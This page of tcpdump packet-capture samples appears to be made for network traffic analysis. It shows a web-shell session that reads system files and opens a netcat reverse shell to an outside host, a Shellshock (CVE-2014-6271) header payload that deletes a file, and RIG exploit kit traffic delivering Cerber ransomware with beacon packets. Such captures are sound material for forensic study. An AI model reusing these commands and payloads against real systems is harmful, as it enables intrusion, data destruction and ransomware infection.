E.._.c@.@…
..d…2.P..{J.,……………
..F–.i.HTTP/1.1 200 OK
Date: Sun, 14 Oct 2018 16:34:34 GMT
Server: Apache/2.2.22 (Ubuntu)
X-Powered-By: PHP/5.3.10-1ubuntu3
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 29
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: text/html

……….+//.MI,I…..@f …
2018-10-14 12:34:34.263625 IP 192.0.2.50.45756 > 10.1.2.100.80: Flags [.], ack 1295, win 260, options [nop,nop,TS val 769026448 ecr 738861], length 0
E..4XD@.?……2
..d…P….{J.W…..S…..
-.i…F-
2018-10-14 12:34:37.227759 IP 192.0.2.50.45756 > 10.1.2.100.80: Flags [P.], seq 545:772, ack 1295, win 260, options [nop,nop,TS val 769027189 ecr 738861], length 227: HTTP: GET /docs/shell.php?cmd=cat%20/etc/lsb-release HTTP/1.1
E…XE@.?……2
..d…P….{J.W….6……
-.lu..F-GET /docs/shell.php?cmd=cat%20/etc/lsb-release HTTP/1.1
Host: 10.1.2.100
Connection: keep-alive
Cookie: PHPSESSID=stlgkh7eb3hq4ctmbi80u0akt0
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: python-requests/2.9.1

2018-10-14 12:34:37.233154 IP 10.1.2.100.80 > 192.0.2.50.45756: Flags [P.], seq 1295:1662, ack 772, win 2212, options [nop,nop,TS val 739614 ecr 769027189], length 367: HTTP: HTTP/1.1 200 OK
E….d@.@..Y
..d…2.P..{J.W…i…..,…..
..I.-.luHTTP/1.1 200 OK
Date: Sun, 14 Oct 2018 16:34:37 GMT
Server: Apache/2.2.22 (Ubuntu)
X-Powered-By: PHP/5.3.10-1ubuntu3
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 97
Keep-Alive: timeout=5, max=98
Connection: Keep-Alive
Content-Type: text/html

2018-10-14 12:34:52.294903 IP 192.0.2.50.45756 > 10.1.2.100.80: Flags [P.], seq 1657:1941, ack 2981, win 337, options [nop,nop,TS val 769030955 ecr 742627], length 284: HTTP: GET /docs/shell.php?cmd=/bin/bash%200%3C/var/tmp/pipe%20%7C%20nc%20192.0.2.50%20443%201%3E/var/tmp/pipe HTTP/1.1
E..PXO@.?……2
..d…P….{J…..Q…….
-.{+..T.GET /docs/shell.php?cmd=/bin/bash%200%3C/var/tmp/pipe%20%7C%20nc%20192.0.2.50%20443%201%3E/var/tmp/pipe HTTP/1.1
Host: 10.1.2.100
Connection: keep-alive
Cookie: PHPSESSID=stlgkh7eb3hq4ctmbi80u0akt0
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: python-requests/2.9.1

2018-10-14 12:34:52.307291 IP 10.1.2.100.45298 > 192.0.2.50.443: Flags [S], seq 3484359733, win 14600, options [mss 1460,sackOK,TS val 743383 ecr 0,nop,wscale 3], length 0
E.. 10.1.2.100.45298: Flags [R.], seq 0, ack 3484359734, win 0, length 0
E..(..@.?..H…2
..d………..6P…B………
2018-10-14 12:34:52.309383 IP 10.1.2.100.80 > 192.0.2.50.45756: Flags [P.], seq 2981:3271, ack 1941, win 2882, options [nop,nop,TS val 743383 ecr 769030955], length 290: HTTP: HTTP/1.1 200 OK
E..V.i@.@…
..d…2.P..{J………B…….
..W.-.{+HTTP/1.1 200 OK
Date: Sun, 14 Oct 2018 16:34:52 GMT
Server: Apache/2.2.22 (Ubuntu)
X-Powered-By: PHP/5.3.10-1ubuntu3
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 20
Keep-Alive: timeout=5, max=93
Connection: Keep-Alive
Content-Type: text/html

2018-10-14 12:54:51.821265 IP 10.1.2.100.22 > 10.1.3.100.49220: Flags [P.], seq 1:40, ack 1, win 1825, length 39
E..O..@.@.+5
..d
..d…D….g…P..!….SSH-2.0-OpenSSH_5.9p1 Debian-5ubuntu1

2018-10-14 12:54:51.827631 IP 10.1.3.100.49220 > 10.1.2.100.22: Flags [P.], seq 1:497, ack 40, win 256, length 496
E…#.@…..
..d
..d.D..g…….P….5..SSH-2.0-PuTTY_Release_0.70
…L…U.4|..m..u~……..curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,rsa2048-sha256,rsa1024-sha1,diffie-hellman-group1-sha1…Wssh-ed25519,ecdsa-sha2-nistp256,ecdsa-sha2-nistp384,ecdsa-sha2-nistp521,ssh-rsa,ssh-dss….aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-ctr,aes192-cbc,aes128-ctr,aes128-cbc,chacha20-poly
2018-10-14 12:54:51.827650 IP 10.1.3.100.49220 > 10.1.2.100.22: Flags [P.], seq 497:1133, ack 40, win 256, length 636
E…#.@…..
..d
..d.D..g…….P…s…1305@openssh.com,blowfish-ctr,blowfish-cbc,3des-ctr,3des-cbc,arcfour256,arcfour128….aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-ctr,aes192-cbc,aes128-ctr,aes128-cbc,chacha20-poly1305@openssh.com,blowfish-ctr,blowfish-cbc,3des-ctr,3des-cbc,arcfour256,arcfour128….hmac-sha2-256,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-sha2-256-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-etm@openssh.com….hmac-sha2-256,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-sha2-256-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-etm@openssh.com… none,zlib… none,zlib……………..
2018-10-14 12:54:51.827709 IP 10.1.2.100.22 > 10.1.3.100.49220: Flags [.], ack 497, win 1959, length 0
E..(..@.@.+[
..d
..d…D….g…P…….
2018-10-14 12:54:51.827744 IP 10.1.2.100.22 > 10.1.3.100.49220: Flags [.], ack 1133, win 2118, length 0
E..(..@.@.+Z
..d
..d…D….g..-P..F….
2018-10-14 12:54:51.828554 IP 10.1.2.100.22 > 10.1.3.100.49220: Flags [P.], seq 40:1024, ack 1133, win 2118, length 984
E…..@.@.’.
..d
..d…D….g..-P..F…….. ..*3.3…p.V#.$……ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1…#ssh-rsa,ssh-dss,ecdsa-sha2-nistp256….aes128-ctr,aes192-ctr,aes256-ctr,arcfour256,arcfour128,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,aes192-cbc,aes256-cbc,arcfour,rijndael-cbc@lysator.liu.se….aes128-ctr,aes192-ctr,aes256-ctr,arcfour256,arcfour128,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,aes192-cbc,aes256-cbc,arcfour,rijndael-cbc@lysator.liu.se….hmac-md5,hmac-sha1,umac-64@openssh.com,hmac-sha2-256,hmac-sha2-256-96,hmac-sha2-512,hmac-sha2-512-96,hmac-ripemd160,hmac-ripemd160@openssh.com,hmac-sha1-96,hmac-md5-96….hmac-md5,hmac-sha1,umac-64@openssh.com,hmac-sha2-256,hmac-sha2-256-96,hmac-sha2-512,hmac-sha2-512-96,hmac-ripemd160,hmac-ripemd160@openssh.com,hmac-sha1-96,hmac-md5-96….none,zlib@openssh.com….none,zlib@openssh.com………………….
2018-10-14 12:54:51.839985 IP 10.1.3.100.49220 > 10.1.2.100.22: Flags [P.], seq 1133:1213, ack 1024, win 252, length 80
E..x#.@…..
..d
..d.D..g..-..”.P….R…..L…..A……E……E0

ShellShock Attack PCAP File Download Traffic Analysis Sample

2017-07-26 16:42:16.277036 IP 130.253.1.120.52744 > 204.79.197.200.80: Flags [P.], seq 15800207:15800243, ack 1402349435, win 115, options [nop,nop,TS val 1182121665 ecr 2059156643], length 36: HTTP: GET /cgi-bin/.svn/entries HTTP/1.1
E..X.+@.>.|….x.O…..P….S.'{…s…….
Fu..z.<.GET /cgi-bin/.svn/entries HTTP/1.1

2017-07-26 16:42:16.277047 IP 130.253.1.120.52744 > 204.79.197.200.80: Flags [P.], seq 36:148, ack 1, win 115, options [nop,nop,TS val 1182121665 ecr 2059156643], length 112: HTTP
E….,@.>.|….x.O…..P….S.'{…s.…..
Fu..z.<.Host: db75d9a4f3c95d8a0adffb672c196e96.du.edu
User-Agent: () { :; }; /bin/rm /var/www/default/CVE-2014-6271

2017-07-26 16:42:16.277082 IP 61.7.186.197.5507 > 130.253.185.203.23: Flags [S], seq 0, win 65535, length 0
E..(:(….W.=……………….P…e…
2017-07-26 16:42:16.277466 IP 60.196.157.234.47651 > 130.253.130.165.1900: UDP, length 94
E..z..@.0.j”<……..#.l.f..M-SEARCH * HTTP/1.1
HOST: 239.255.255.250:1900
MAN: ssdp:discover
MX: 10
ST: ssdp:all

.
2017-07-26 16:42:16.282511 IP 91.223.133.13.42880 > 130.253.95.133.3404: Flags [S], seq 670678803, win 1024, length 0
E(.(…….^[…..….L’…….P…L…
2017-07-26 16:42:16.282575 IP 91.223.133.13.42880 > 130.253.95.125.3404: Flags [S], seq 2388976086, win 1024, length 0
E(.(……RY[…..}…L.d……P….s..
2017-07-26 16:42:16.282695 IP 213.49.124.141.50470 > 130.253.126.22.81: Flags [S], seq 3098327735, win 14600, options [mss 1452,sackOK,TS val 9607180 ecr 0,nop,wscale 1], length 0
E .<.4@.5….1|…~..&.Q……….9………… …………
2017-07-26 16:42:16.283075 IP 74.94.22.81.64396 > 130.253.68.156.23: Flags [S], seq 2197636252, win 40676, length 0
E .(.p..6…J^.Q..D…….D…..P…%x..
2017-07-26 16:42:16.287606 IP 74.109.122.3.37142 > 130.253.119.199.23: Flags [S], seq 2197649351, win 2461, options [mss 1460], length 0
E..,.8..5..Jmz…w…….w…..`. .Cb……
2017-07-26 16:42:16.288426 IP 114.230.11.31.35388 > 130.253.49.6.23: Flags [S], seq 2197631238, win 38956, length 0
E..(….1…r…..1..<….1…..P..,.V..
2017-07-26 16:42:16.291979 IP 119.193.140.179.2420 > 130.253.232.246.22: Flags [S], seq 2197678326, win 1067, length 0
E..(….0…w……. t……….P..+….
2017-07-26 16:42:16.293510 IP 77.72.82.14.42775 > 130.253.225.5.3344: Flags [S], seq 1899387472, win 1024, length 0
E..(.E…..1MHR………q6ZP….P…(…
2017-07-26 16:42:16.294581 IP 77.72.82.14.42775 > 130.253.57.86.3307: Flags [S], seq 2659645233, win 1024, length 0
E..(……..MHR…9V…….1….P….~..
2017-07-26 16:42:16.296551 IP 123.188.246.124.42492 > 130.253.123.118.23: Flags [S], seq 2197650294, win 48868, length 0
E..(….1.*.{..|..{v……{v….P…….
2017-07-26 16:42:16.297055 IP 115.148.242.216.17414 > 130.253.215.62.29917: Flags [S], seq 4072809910, win 65535, options [mss 1452,nop,wscale 2,nop,nop,sackOK], length 0
E..4,^@….s……>D.t…%…………………….
2017-07-26 16:42:16.300902 IP 185.195.201.148.32512 > 130.253.123.83.1900: Flags [S], seq 0, win 65535, length 0
E(.(.a@.4………{S…l……..P…….
2017-07-26 16:42:16.301542 IP 218.76.253.134.30694 > 130.253.215.62.30208: UDP, length 31
E..;.S..p..P.L…..>w.v..”l……0
……a…………….

RIG Exploit Kit EK Delivers Cerber Ransomware Malware PCAP File Download Traffic Sample

2016-10-18 14:40:36.304404 IP 10.10.18.102.49185 > 195.133.201.132.80: Flags [P.], seq 1:477, ack 1, win 258, length 476: HTTP: GET /?x3qJc7iVLB3LDIU=l3SKfPrfJxzFGMSUb-nJDa9BNUXCRQLPh4SGhKrXCJ-ofSih17OIFxzsmTu2KTKvgJQyfu0SaGyj1BKeO10hjoUeWF8Z5e3x1RSL2x3fipSA9weJMwNHqpuRQuA60Q6jyLlFdM0ilROKvWBSy7sUUg4T6BgY0Q HTTP/1.1
E….O@…N+

.f…..!.P0.X.]..MP…….GET /?x3qJc7iVLB3LDIU=l3SKfPrfJxzFGMSUb-nJDa9BNUXCRQLPh4SGhKrXCJ-ofSih17OIFxzsmTu2KTKvgJQyfu0SaGyj1BKeO10hjoUeWF8Z5e3x1RSL2x3fipSA9weJMwNHqpuRQuA60Q6jyLlFdM0ilROKvWBSy7sUUg4T6BgY0Q HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: http://www.basket-brabant.be/
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: add.jamesthorpebourbon.com
Connection: Keep-Alive

2016-10-18 14:40:36.504124 IP 195.133.201.132.80 > 10.10.18.102.49185: Flags [.], ack 477, win 237, length 0
E..(.T@.5…….

.f.P.!]..M0.Z.P…E+..
2016-10-18 14:40:37.014717 IP 195.133.201.132.80 > 10.10.18.102.49185: Flags [.], seq 1:1322, ack 477, win 237, length 1321: HTTP: HTTP/1.1 200 OK
E..Q.U@.5…….

.f.P.!]..M0.Z.P…….HTTP/1.1 200 OK
Server: nginx/1.6.2
Date: Tue, 18 Oct 2016 18:40:36 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 18876
Connection: keep-alive
Vary: Accept-Encoding
Content-Encoding: gzip

2016-10-18 14:41:31.393471 IP 10.10.18.102.54101 > 31.184.234.169.6892: UDP, length 9
E..%.^……

.f…..U…..Xhi008c1c4………
2016-10-18 14:41:31.393481 IP 10.10.18.102.54101 > 31.184.234.170.6892: UDP, length 9
E..%._……

.f…..U…..Whi008c1c4………
2016-10-18 14:41:31.393494 IP 10.10.18.102.54101 > 31.184.234.171.6892: UDP, length 9
E..%.`……

.f…..U…..Vhi008c1c4………
2016-10-18 14:41:31.393504 IP 10.10.18.102.54101 > 31.184.234.172.6892: UDP, length 9
E..%.a……

.f…..U…..Uhi008c1c4………
2016-10-18 14:41:31.393514 IP 10.10.18.102.54101 > 31.184.234.173.6892: UDP, length 9
E..%.b……

.f…..U…..Thi008c1c4………
2016-10-18 14:41:31.393524 IP 10.10.18.102.54101 > 31.184.234.174.6892: UDP, length 9
E..%.c……

.f…..U…..Shi008c1c4………
2016-10-18 14:41:31.393534 IP 10.10.18.102.54101 > 31.184.234.175.6892: UDP, length 9
E..%.d……

.f…..U…..Rhi008c1c4………
2016-10-18 14:41:31.393544 IP 10.10.18.102.54101 > 31.184.234.176.6892: UDP, length 9
E..%.e……

.f…..U…..Qhi008c1c4………
2016-10-18 14:41:31.393554 IP 10.10.18.102.54101 > 31.184.234.177.6892: UDP, length 9
E..%.f……

.f…..U…..Phi008c1c4………
2016-10-18 14:41:31.393565 IP 10.10.18.102.54101 > 31.184.234.178.6892: UDP, length 9
E..%.g……

.f…..U…..Ohi008c1c4………
2016-10-18 14:41:31.393575 IP 10.10.18.102.54101 > 31.184.234.179.6892: UDP, length 9
E..%.h……

.f…..U…..Nhi008c1c4………
2016-10-18 14:41:31.393585 IP 10.10.18.102.54101 > 31.184.234.180.6892: UDP, length 9
E..%.i……

.f…..U…..Mhi008c1c4………
2016-10-18 14:41:31.393598 IP 10.10.18.102.54101 > 31.184.234.181.6892: UDP, length 9
E..%.j……

.f…..U…..Lhi008c1c4………
2016-10-18 14:41:31.393608 IP 10.10.18.102.54101 > 31.184.234.182.6892: UDP, length 9
E..%.k……

.f…..U…..Khi008c1c4………
2016-10-18 14:41:31.393618 IP 10.10.18.102.54101 > 31.184.234.183.6892: UDP, length 9
E..%.l…..}

.f…..U…..Jhi008c1c4………
2016-10-18 14:41:31.393628 IP 10.10.18.102.54101 > 31.184.234.184.6892: UDP, length 9
E..%.m…..{